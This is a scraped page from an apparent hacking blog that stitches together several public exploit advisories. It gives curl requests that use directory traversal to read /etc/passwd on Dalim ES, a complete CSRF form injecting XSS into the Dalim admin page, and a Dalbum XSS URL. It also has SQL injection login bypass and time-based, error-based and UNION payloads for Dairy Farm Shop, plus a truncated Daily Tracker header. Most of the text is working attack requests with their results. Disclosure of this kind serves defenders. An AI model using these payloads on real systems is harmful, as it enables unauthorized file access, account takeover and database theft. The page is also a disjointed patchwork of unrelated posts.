DALIM SOFTWARE ES Core 5.0 build 7184.1 Multiple Remote File Disclosures
Vendor: Dalim Software GmbH
Product web page: https://www.dalim.com
Affected version: ES/ESPRiT 5.0 (build 7184.1)
(build 7163.2)
(build 7163.0)
(build 7135.0)
(build 7114.1)
(build 7114.0)
(build 7093.1)
(build 7093.0)
(build 7072.0)
(build 7051.3)
(build 7051.1)
(build 7030.0)
(build 7009.0)
(build 6347.0)
(build 6326.0)
(build 6305.1)
(build 6235.9)
(build 6172.1)
ES/ESPRiT 4.5 (build 6326.0)
(build 6144.2)
(build 5180.2)
(build 5096.0)
(build 4314.3)
(build 4314.0)
(build 4146.4)
(build 3308.3)
ES/ESPRiT 4.0 (build 4202.0)
(build 4132.1)
(build 2235.0)
ES/ESPRiT 3.0
Summary: ES is the new Enterprise Solution from DALIM SOFTWARE built
from the successful TWIST, DIALOGUE and MISTRAL product lines. The ES
Core is the engine that can handle project tracking, JDF device workflow,
dynamic user interface building, volume management. Each ES installation
will have different features, depending on the license installed: online
approval, prepress workflow, project tracking, imposition management...
ES is a collaborative digital asset production and management platform,
offering services ranging from online approval to web-based production
environment for all participants of the production cycle, including brand
owners, agencies, publishers, pre-media, printers and multichannel service
provider. ES lets users plan, execute and control any aspect of media
production, regardless of the final use of the output (print, web, ebook,
movie, and others). It ensures productivity and longterm profitability.
Desc: Input passed thru several parameters is not properly verified before
being used to read files. This can be exploited by an unauthenticated
attacker to read arbitrary files from local resources with directory
traversal attacks.
Tested on: Red Hat Enterprise Linux Server release 7.3 (Maipo)
CentOS 7
Apache Tomcat/7.0.78
Apache Tomcat/7.0.67
Apache Tomcat/7.0.42
Apache Tomcat/6.0.35
Apache-Coyote/1.1
Java/1.7.0_80
Java/1.6.0_21
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5427
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5427.php
15.06.2017
--
---------------------------------------------------
1. PoC request for Password.jsp, orgName parameter:
---------------------------------------------------
~ curl -v http://TARGET:8080/Esprit/public/Password.jsp\?orgName\=../../../../../../../../../etc/passwd
* Trying TARGET...
* TCP_NODELAY set
* Connected to TARGET (TARGET) port 8080 (#0)
> GET /Esprit/public/Password.jsp?orgName=../../../../../../../../../etc/passwd HTTP/1.1
> Host: TARGET:8080
> User-Agent: curl/7.51.0
> Accept: */*
>
< HTTP/1.1 200 OK
< Content-Type: text/html;charset=UTF-8
< Transfer-Encoding: chunked
< Date: Thu, 15 Jun 2017 02:18:44 GMT
< Server: Server
<
--snip--
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/syncshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
--snip--
----------------------------------------------------
2. PoC request for Login.jsp, orgUnitName parameter:
----------------------------------------------------
~ curl -v http://TARGET/Esprit/ES/Login\?orgUnitName\=../../../../../../../../../etc/passwd
* Trying TARGET...
* TCP_NODELAY set
* Connected to TARGET (TARGET) port 80 (#0)
> GET /Esprit/ES/Login?orgUnitName=../../../../../../../../../etc/passwd HTTP/1.1
> Host: TARGET
> User-Agent: curl/7.51.0
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Thu, 15 Jun 2017 02:19:31 GMT
< Server: Server
< Content-Type: text/html;charset=UTF-8
< Set-Cookie: JSESSIONID=0ECF83AA0D337B5D942B5C164B172051; Path=/Esprit; HttpOnly
< Transfer-Encoding: chunked
<
--snip--
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/syncshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
--snip--
---------------------------------------
3. PoC request for log, file parameter:
---------------------------------------
~ curl http://TARGET:8080/dalimws/log\?file\=../../../../../../../etc/passwd\&len\=10000\&download\=true -v
* Trying TARGET...
* TCP_NODELAY set
* Connected to TARGET (TARGET) port 8080 (#0)
> GET /dalimws/log?file=../../../../../../../etc/passwd&len=10000&download=true HTTP/1.1
> Host: TARGET:8080
> User-Agent: curl/7.51.0
> Accept: */*
>
< HTTP/1.1 200 OK
< Content-Disposition: attachment; filename=../../../../../../../etc/passwd
< Content-Type: text/plain
< Content-Length: 10000
< Date: Thu, 15 Jun 2017 02:20:17 GMT
< Server: Server
<
--snip--
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
--snip--
---------------------------------------
4. PoC request for log, file parameter:
---------------------------------------
POST /dalimws/log HTTP/1.1
Host: TARGET:8080
Content-Length: 116
User-Agent: H2O
Content-type: application/x-www-form-urlencoded
Accept: */*
Accept-Language: en-US,en;q=0.8,mk;q=0.6
Connection: close
file=../../../../../../../symlnks/common/tomcat7.0/conf/web.xml&len=1000000&XUI_SessionID=LOGReq&responseWiter=XML
Response:
--snip--
<!-- The mapping for the default servlet -->
<servlet-mapping>
<servlet-name>default</servlet-name>
<url-pattern>/</url-pattern>
</servlet-mapping>
<!-- The mappings for the JSP servlet -->
<servlet-mapping>
<servlet-name>jsp</servlet-name>
<url-pattern>*.jsp</url-pattern>
<url-pattern>*.jspx</url-pattern>
</servlet-mapping>
--snip--
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863151870
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
<!--
DALIM SOFTWARE ES Core 5.0 build 7184.1 Multiple Stored XSS And CSRF Vulnerabilities
Vendor: Dalim Software GmbH
Product web page: https://www.dalim.com
Affected version: ES/ESPRiT 5.0 (build 7184.1)
(build 7163.2)
(build 7163.0)
(build 7135.0)
(build 7114.1)
(build 7114.0)
(build 7093.1)
(build 7093.0)
(build 7072.0)
(build 7051.3)
(build 7051.1)
(build 7030.0)
(build 7009.0)
(build 6347.0)
(build 6326.0)
(build 6305.1)
(build 6235.9)
(build 6172.1)
ES/ESPRiT 4.5 (build 6326.0)
(build 6144.2)
(build 5180.2)
(build 5096.0)
(build 4314.3)
(build 4314.0)
(build 4146.4)
(build 3308.3)
ES/ESPRiT 4.0 (build 4202.0)
(build 4132.1)
(build 2235.0)
ES/ESPRiT 3.0
Summary: ES is the new Enterprise Solution from DALIM SOFTWARE built
from the successful TWIST, DIALOGUE and MISTRAL product lines. The ES
Core is the engine that can handle project tracking, JDF device workflow,
dynamic user interface building, volume management. Each ES installation
will have different features, depending on the license installed: online
approval, prepress workflow, project tracking, imposition management...
ES is a collaborative digital asset production and management platform,
offering services ranging from online approval to web-based production
environment for all participants of the production cycle, including brand
owners, agencies, publishers, pre-media, printers and multichannel service
provider. ES lets users plan, execute and control any aspect of media
production, regardless of the final use of the output (print, web, ebook,
movie, and others). It ensures productivity and longterm profitability.
Desc: The application allows users to perform certain actions via HTTP
requests without performing any validity checks to verify the requests.
This can be exploited to perform certain actions with administrative
privileges if a logged-in user visits a malicious web site. XSS issues
were also discovered. The issue is triggered when an unauthorized input
passed via multiple POST and GET parameters are not properly sanitized
before being returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in context
of an affected site.
Tested on: Red Hat Enterprise Linux Server release 7.3 (Maipo)
CentOS 7
Apache Tomcat/7.0.78
Apache Tomcat/7.0.67
Apache Tomcat/7.0.42
Apache Tomcat/6.0.35
Apache-Coyote/1.1
Java/1.7.0_80
Java/1.6.0_21
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5426
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5426.php
15.06.2017
-->
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://TARGET:8080/dalimws/admin" method="POST">
<input type="hidden" name="Prop/DeviceName" value="TESTHOST</script><script>alert(1)</script>" />
<input type="hidden" name="Prop_DeviceName_edit" value="TESTHOST" />
<input type="hidden" name="Prop/DeviceID" value="WebService-2510717331</script><script>alert(2)</script>" />
<input type="hidden" name="Prop_DeviceID_edit" value="WebService-2510717331" />
<input type="hidden" name="Prop/QueueCapacity" value="-1</script>script>alert(3)</script>" />
<input type="hidden" name="Prop_QueueCapacity_edit" value="-1" />
<input type="hidden" name="Prop/AbortOnNothingDone" value="false" />
<input type="hidden" name="Prop/IgnoreNodeInfo" value="false" />
<input type="hidden" name="Prop/SecurityPassword" value="" />
<input type="hidden" name="Prop_SecurityPassword_edit" value="" />
<input type="hidden" name="Prop/QueueFolderPath" value="/symlnks/io/jobs/JDFDevice/queue</script><script>alert(4)</script>" />
<input type="hidden" name="Prop_QueueFolderPath_edit" value="/symlnks/io/jobs/JDFDevice/queue" />
<input type="hidden" name="Prop/PluginFolderPath" value="/symlnks/DALiM_6.0/jdfplugins" />
<input type="hidden" name="Prop_PluginFolderPath_edit" value="/symlnks/DALiM_6.0/jdfplugins</script><script>alert(5)</script>" />
<input type="hidden" name="Prop/HotFolderPath" value="/symlnks/io/jobs/JDFDevice/hotfolder</script><script>alert(6)</script>" />
<input type="hidden" name="Prop_HotFolderPath_edit" value="/symlnks/io/jobs/JDFDevice/hotfolder" />
<input type="hidden" name="Prop/DestinationFolderPath" value="/symlnks/io/jobs/JDFDevice/output" />
<input type="hidden" name="Prop_DestinationFolderPath_edit" value="/symlnks/io/jobs/JDFDevice/output</script><script>alert(7)</script>" />
<input type="hidden" name="Prop/ControllerURL" value="http://TESTHOST:8080/dalimws/controller</script><script>alert(8)</script>" />
<input type="hidden" name="Prop_ControllerURL_edit" value="http://TESTHOST:8080/dalimws/controller" />
<input type="hidden" name="Prop_DBSettings_edit" value="" />
<input type="hidden" name="Prop/DBSettings" value="" />
<input type="hidden" name="Prop/JDBC_Driver" value="org.hsqldb.jdbcDriver</script><script>alert(9)</script>" />
<input type="hidden" name="Prop_JDBC_Driver_edit" value="org.hsqldb.jdbcDriver" />
<input type="hidden" name="Prop/JDBC_URL" value="jdbc:hsqldb:/symlnks/io/jobs/JDFDevice/queue/QueueDB" />
<input type="hidden" name="Prop_JDBC_URL_edit" value="jdbc:hsqldb:/symlnks/io/jobs/JDFDevice/queue/QueueDB" />
<input type="hidden" name="Prop/JDBC_User" value="SA" />
<input type="hidden" name="Prop_JDBC_User_edit" value="SA" />
<input type="hidden" name="Prop/JDBC_Password" value="null" />
<input type="hidden" name="Prop_JDBC_Password_edit" value="null" />
<input type="hidden" name="Prop_LogLevel_edit" value="Information" />
<input type="hidden" name="Prop/LogLevel" value="INFO" />
<input type="hidden" name="Prop_LogFiles_edit" value="stdout.log" />
<input type="hidden" name="Prop/LogFiles" value="stdout.log" />
<input type="hidden" name="Prop/LogContent" value="" />
<input type="hidden" name="Prop_LogContent_edit" value="" />
<input type="hidden" name="com/dalim/esprit/devices/imageserverpreview/ImageServerPreview/CacheSize" value="1000" />
<input type="hidden" name="com_dalim_esprit_devices_imageserverpreview_ImageServerPreview_CacheSize_edit" value="1000" />
<input type="hidden" name="com/dalim/esprit/devices/imageserverpreview/ImageServerPreview/CacheFolder" value="/symlnks/io/jobs/dialogue/cache" />
<input type="hidden" name="com_dalim_esprit_devices_imageserverpreview_ImageServerPreview_CacheFolder_edit" value="/symlnks/io/jobs/dialogue/cache" />
<input type="hidden" name="com_dalim_esprit_devices_imageserverpreview_ImageServerPreview_TextExtractionVersion_edit" value="2" />
<input type="hidden" name="com/dalim/esprit/devices/imageserverpreview/ImageServerPreview/TextExtractionVersion" value="2" />
<input type="hidden" name="com/dalim/jdf/process/plugin/twist/TwistPlugin/TwistGate" value="TWIST7-1" />
<input type="hidden" name="com_dalim_jdf_process_plugin_twist_TwistPlugin_TwistGate_edit" value="TWIST7-1" />
<input type="hidden" name="com/dalim/jdf/process/plugin/twist/TwistPlugin/GatePort" value="6042" />
<input type="hidden" name="com_dalim_jdf_process_plugin_twist_TwistPlugin_GatePort_edit" value="6042" />
<input type="hidden" name="com/dalim/jdf/process/plugin/twist/TwistPlugin/DirectFileIO" value="false" />
<input type="hidden" name="com/dalim/esprit/devices/ddms/cylindermontage/CylinderMontageProcess/fontRegistrationURL" value="" />
<input type="hidden" name="com_dalim_esprit_devices_ddms_cylindermontage_CylinderMontageProcess_fontRegistrationURL_edit" value="" />
<input type="hidden" name="com/dalim/esprit/devices/ddms/cylindermontage/CylinderMontageProcess/jdfProviderURL" value="" />
<input type="hidden" name="com_dalim_esprit_devices_ddms_cylindermontage_CylinderMontageProcess_jdfProviderURL_edit" value="" />
<input type="hidden" name="com/dalim/esprit/devices/ddms/cylindermontage/CylinderMontageProcess/layoutFolder" value="false" />
<input type="hidden" name="com_dalim_esprit_devices_ddms_cylindermontage_CylinderMontageProcess_layoutFolder_edit" value="false" />
<input type="hidden" name="com/dalim/esprit/devices/ddms/cylindermontage/CylinderMontageProcess/markFolder" value="" />
<input type="hidden" name="com_dalim_esprit_devices_ddms_cylindermontage_CylinderMontageProcess_markFolder_edit" value="" />
<input type="hidden" name="com/dalim/esprit/devices/ddms/cylindermontage/CylinderMontageProcess/markTmp" value="" />
<input type="hidden" name="com_dalim_esprit_devices_ddms_cylindermontage_CylinderMontageProcess_markTmp_edit" value="" />
<input type="hidden" name="com/dalim/devices/archiverestore/ArchivePlugin/P5Server" value="127.0.0.1" />
<input type="hidden" name="com_dalim_devices_archiverestore_ArchivePlugin_P5Server_edit" value="127.0.0.1" />
<input type="hidden" name="com/dalim/devices/archiverestore/ArchivePlugin/P5ServerPort" value="8000" />
<input type="hidden" name="com_dalim_devices_archiverestore_ArchivePlugin_P5ServerPort_edit" value="8000" />
<input type="hidden" name="com/dalim/devices/archiverestore/ArchivePlugin/P5User" value="super" />
<input type="hidden" name="com_dalim_devices_archiverestore_ArchivePlugin_P5User_edit" value="super" />
<input type="hidden" name="com/dalim/devices/archiverestore/ArchivePlugin/P5Password" value="super" />
<input type="hidden" name="com_dalim_devices_archiverestore_ArchivePlugin_P5Password_edit" value="super" />
<input type="hidden" name="com/dalim/devices/archiverestore/ArchivePlugin/P5Client" value="" />
<input type="hidden" name="com_dalim_devices_archiverestore_ArchivePlugin_P5Client_edit" value="" />
<input type="hidden" name="com/dalim/jdf/process/plugin/fileinput/FileInputPlugin/HotfolderLogging" value="false" />
<input type="hidden" name="com/dalim/jdf/process/plugin/fileinput/FileInputPlugin/FtpPort" value="" />
<input type="hidden" name="com_dalim_jdf_process_plugin_fileinput_FileInputPlugin_FtpPort_edit" value="" />
<input type="hidden" name="com/dalim/jdf/process/plugin/fileinput/FileInputPlugin/FtpDataRoot" value="/symlnks/io/jobs/ftpd/data" />
<input type="hidden" name="com_dalim_jdf_process_plugin_fileinput_FileInputPlugin_FtpDataRoot_edit" value="/symlnks/io/jobs/ftpd/data" />
<input type="hidden" name="com/dalim/jdf/process/plugin/fileinput/FileInputPlugin/FtpwatcherRoot" value="/symlnks/io/jobs/ftpwatcher" />
<input type="hidden" name="com_dalim_jdf_process_plugin_fileinput_FileInputPlugin_FtpwatcherRoot_edit" value="/symlnks/io/jobs/ftpwatcher" />
<input type="hidden" name="com/dalim/jdf/process/plugin/fileinput/FileInputPlugin/FtpwatcherLogging" value="false" />
<input type="hidden" name="com/dalim/jdf/process/plugin/fileinput/FileInputPlugin/MailwatcherRoot" value="/symlnks/io/jobs/mailwatcher" />
<input type="hidden" name="com_dalim_jdf_process_plugin_fileinput_FileInputPlugin_MailwatcherRoot_edit" value="/symlnks/io/jobs/mailwatcher" />
<input type="hidden" name="com/dalim/jdf/process/plugin/fileinput/FileInputPlugin/FilemonitorRoot" value="" />
<input type="hidden" name="com_dalim_jdf_process_plugin_fileinput_FileInputPlugin_FilemonitorRoot_edit" value="" />
<input type="hidden" name="com/dalim/jdf/process/plugin/fileinput/FileInputPlugin/FilemonitorBatchCount" value="1" />
<input type="hidden" name="com_dalim_jdf_process_plugin_fileinput_FileInputPlugin_FilemonitorBatchCount_edit" value="1" />
<input type="hidden" name="com_dalim_jdf_process_plugin_fileinput_FileInputPlugin_MetadataType_edit" value="DETAILED" />
<input type="hidden" name="com/dalim/jdf/process/plugin/fileinput/FileInputPlugin/MetadataType" value="DETAILED" />
<input type="hidden" name="com_dalim_jdf_process_plugin_fileinput_FileInputPlugin_DatabaseType_edit" value="hsqldb" />
<input type="hidden" name="com/dalim/jdf/process/plugin/fileinput/FileInputPlugin/DatabaseType" value="hsqldb" />
<input type="hidden" name="com/dalim/jdf/process/plugin/csconv/ColorSpaceConversionPlugin/BaseFolder" value="" />
<input type="hidden" name="com_dalim_jdf_process_plugin_csconv_ColorSpaceConversionPlugin_BaseFolder_edit" value="" />
<input type="hidden" name="com/dalim/jdf/process/plugin/csconv/ColorSpaceConversionPlugin/CheckInterval" value="-1" />
<input type="hidden" name="com_dalim_jdf_process_plugin_csconv_ColorSpaceConversionPlugin_CheckInterval_edit" value="-1" />
<input type="hidden" name="com/dalim/jdf/plugin/etwist/server/ETwistServerPlugin/LogfileMaxSize" value="100M" />
<input type="hidden" name="com_dalim_jdf_plugin_etwist_server_ETwistServerPlugin_LogfileMaxSize_edit" value="100M" />
<input type="hidden" name="com/dalim/jdf/plugin/etwist/server/ETwistServerPlugin/LogfileMaxCount" value="10" />
<input type="hidden" name="com_dalim_jdf_plugin_etwist_server_ETwistServerPlugin_LogfileMaxCount_edit" value="10" />
<input type="hidden" name="com/dalim/jdf/plugin/etwist/server/ETwistServerPlugin/LogAddHD" value="false" />
<input type="hidden" name="com/dalim/jdf/plugin/etwist/server/ETwistServerPlugin/LogIntoTomcatLog" value="false" />
<input type="hidden" name="com_dalim_jdf_plugin_etwist_server_ETwistServerPlugin_LoggingLevel_edit" value="INFO" />
<input type="hidden" name="com/dalim/jdf/plugin/etwist/server/ETwistServerPlugin/LoggingLevel" value="INFO" />
<input type="hidden" name="com/dalim/jdf/plugin/etwist/server/ETwistServerPlugin/ExtraServerLogging" value="false" />
<input type="hidden" name="com/dalim/jdf/plugin/etwist/server/ETwistServerPlugin/ServerPort" value="6019" />
<input type="hidden" name="com_dalim_jdf_plugin_etwist_server_ETwistServerPlugin_ServerPort_edit" value="6019" />
<input type="hidden" name="com_dalim_jdf_plugin_etwist_server_ETwistServerPlugin_PublishWorkflows_edit" value="on" />
<input type="hidden" name="com/dalim/jdf/plugin/etwist/server/ETwistServerPlugin/PublishWorkflows" value="true" />
<input type="hidden" name="com_dalim_jdf_plugin_etwist_server_ETwistServerPlugin_RetLogLocation_edit" value="JDFResult" />
<input type="hidden" name="com/dalim/jdf/plugin/etwist/server/ETwistServerPlugin/RetLogLocation" value="JDFResult" />
<input type="hidden" name="com_dalim_jdf_plugin_etwist_server_ETwistServerPlugin_LogAlways_edit" value="on" />
<input type="hidden" name="com/dalim/jdf/plugin/etwist/server/ETwistServerPlugin/LogAlways" value="true" />
<input type="hidden" name="com/dalim/jdf/plugin/etwist/server/ETwistServerPlugin/MaxProcessCount" value="16" />
<input type="hidden" name="com_dalim_jdf_plugin_etwist_server_ETwistServerPlugin_MaxProcessCount_edit" value="16" />
<input type="hidden" name="com/dalim/jdf/plugin/etwist/server/ETwistServerPlugin/MaxRunningProcessCount" value="16" />
<input type="hidden" name="com_dalim_jdf_plugin_etwist_server_ETwistServerPlugin_MaxRunningProcessCount_edit" value="16" />
<input type="hidden" name="com/dalim/jdf/plugin/etwist/server/ETwistServerPlugin/HardworkerCount" value="2" />
<input type="hidden" name="com_dalim_jdf_plugin_etwist_server_ETwistServerPlugin_HardworkerCount_edit" value="2" />
<input type="hidden" name="com/dalim/jdf/plugin/etwist/server/ETwistServerPlugin/RepositoryUrl" value="http://localhost:8080/EspritEngine/JMFProcessor.html/servlet/etwistrepository" />
<input type="hidden" name="com_dalim_jdf_plugin_etwist_server_ETwistServerPlugin_RepositoryUrl_edit" value="http://localhost:8080/EspritEngine/JMFProcessor.html/servlet/etwistrepository" />
<input type="hidden" name="Prop/queueIsRunning" value="false" />
<input type="hidden" name="Prop/action" value="return" />
<input type="hidden" name="XUI_SessionID" value="admin976" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
source: https://www.securityfocus.com/bid/47427/info
Dalbum is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Dalbum 1.43 is vulnerable; other versions may also be affected.
http://www.example.com/editini.php?album=/Sample%20album/&url=[xss]
# Exploit Title: Dairy Farm Shop Management System 1.0 - SQL Injection Authentication Bypass
# Date: 2021-09-30
# Exploit Author: sanjay singh
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/dairy-farm-shop-management-system-using-php-and-mysql/
# Version: v1.0
# Tested on: Windows 10
Steps-To-Reproduce:
Step 1 Go to the Product admin panel http://localhost/dfsms/index.php.
Step 2 – Enter anything in username and password
Step 3 – Click on Login and capture the request in the burp suite
Step 4 – Change the username to admin' or '1'='1 and password to dfsms
Step 5 – Click forward and now you will be logged in as admin.
POC
POST /dfsms/index.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 57
Origin: http://localhost
Connection: close
Referer: http://localhost/dfsms/index.php
Cookie: PHPSESSID=hgjvarn4tie1nmsufdn8mf1hrl
Upgrade-Insecure-Requests: 1
username=admin%27+or+%271%27%3D%271&password=dfsms&login=
# Exploit Title: Dairy Farm Shop Management System 1.0 - 'username' SQL Injection
# Google Dork: N/A
# Date: 2020-01-03
# Exploit Author: Chris Inzinga
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/dairy-farm-shop-management-system-using-php-and-mysql/
# Version: v1.0
# Tested on: Windows
# CVE: N/A
# The Dairy Farm Shop Management System 1.0 web application is vulnerable to
# SQL injection in multiple areas. The most severe of these is the username
# parameter on the login page as this injection can be done unauthenticated.
================================ 'username' - SQLi ================================
POST /dfsms/index.php HTTP/1.1
Host: 192.168.0.33
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.33/dfsms/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 34
Connection: close
Cookie: PHPSESSID=ogvk4oricas9oudnb7hb88kgjg
Upgrade-Insecure-Requests: 1
username=test&password=test&login=
---
Parameter: username (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=test' AND (SELECT 5667 FROM (SELECT(SLEEP(5)))mKGL) AND 'UlkV'='UlkV&password=test&login=
---
[INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
================================ 'category' & 'categorycode' - SQLi ================================
POST /dfsms/add-category.php HTTP/1.1
Host: 192.168.0.33
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.33/dfsms/add-category.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 39
Connection: close
Cookie: PHPSESSID=ogvk4oricas9oudnb7hb88kgjg
Upgrade-Insecure-Requests: 1
category=test&categorycode=test&submit=
---
Parameter: category (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: category=test' AND (SELECT 8892 FROM (SELECT(SLEEP(5)))WzFH) AND 'NELe'='NELe&categorycode=test&submit=
---
[INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
---
Parameter: categorycode (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: category=test&categorycode=test' AND (SELECT 9140 FROM (SELECT(SLEEP(5)))bzQA) AND 'izaK'='izaK&submit=
---
[INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
================================ 'companyname' - SQLi ================================
---
Parameter: companyname (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: companyname=test' AND (SELECT 7565 FROM (SELECT(SLEEP(5)))znna) AND 'bEUm'='bEUm&submit=
---
[INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
================================ 'productname' & 'productprice' - SQLi ================================
---
Parameter: productname (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: category=Milk&company=Amul&productname=test' AND (SELECT 1171 FROM (SELECT(SLEEP(5)))rlQI) AND 'RgaN'='RgaN&productprice=test&submit=
---
---
Parameter: productprice (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: category=Milk&company=Amul&productname=test&productprice=test' AND (SELECT 8940 FROM (SELECT(SLEEP(5)))BRuk) AND 'Imqh'='Imqh&submit=
---
[INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
================================ 'fromdate' & 'todate' - SQLi ================================
---
Parameter: todate (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: fromdate=2020-01-05&todate=-6737' OR 3099=3099#&submit=
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: fromdate=2020-01-05&todate=2020-01-31' OR (SELECT 3665 FROM(SELECT COUNT(*),CONCAT(0x7162766271,(SELECT (ELT(3665=3665,1))),0x716a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- mqby&submit=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: fromdate=2020-01-05&todate=2020-01-31' AND (SELECT 5717 FROM (SELECT(SLEEP(5)))adaE)-- cLAK&submit=
Type: UNION query
Title: MySQL UNION query (NULL) - 5 columns
Payload: fromdate=2020-01-05&todate=2020-01-31' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162766271,0x666369456150614b454a4f51454e6e687449724a786445585455515a67614162754545716d476f6f,0x716a7a7171),NULL#&submit=
Parameter: fromdate (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: fromdate=2020-01-05' AND (SELECT 7128 FROM(SELECT COUNT(*),CONCAT(0x7162766271,(SELECT (ELT(7128=7128,1))),0x716a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Tzxh&todate=2020-01-31&submit=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: fromdate=2020-01-05' AND (SELECT 7446 FROM (SELECT(SLEEP(5)))Aklw)-- uzkF&todate=2020-01-31&submit=
---
================================ 'mobilenumber' & 'emailid' & 'adminname' - SQLi ================================
---
Parameter: emailid (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: adminname=Admin&username=admin&emailid=admin@test.com' AND (SELECT 5884 FROM (SELECT(SLEEP(5)))EgFJ) AND 'kFGt'='kFGt&mobilenumber=1234567899&update=
---
---
Parameter: adminname (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: adminname=Admin' AND (SELECT 5969 FROM (SELECT(SLEEP(5)))vpfG) AND 'kOJS'='kOJS&username=admin&emailid=admin@test.com&mobilenumber=1234567899&update=
---
---
Parameter: mobilenumber (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: adminname=Admin&username=admin&emailid=admin@test.com&mobilenumber=1234567899' AND (SELECT 1163 FROM (SELECT(SLEEP(5)))rdwj) AND 'mnwu'='mnwu&update=
---
# Exploit Title: Daily Tracker System 1.0 - Authentication Bypass
# Exploit Author: Adeeb Shah (@hyd3sec) & Bobby Cooke (boku)
# CVE ID: CVE-2020-24193
# Date: September 2, 2020
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/download-code?nid=14372&title=Daily+Tracker+System+in+PHP%2FMySQL
# Version: 1.0
# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4
# Vulnerable Source Code
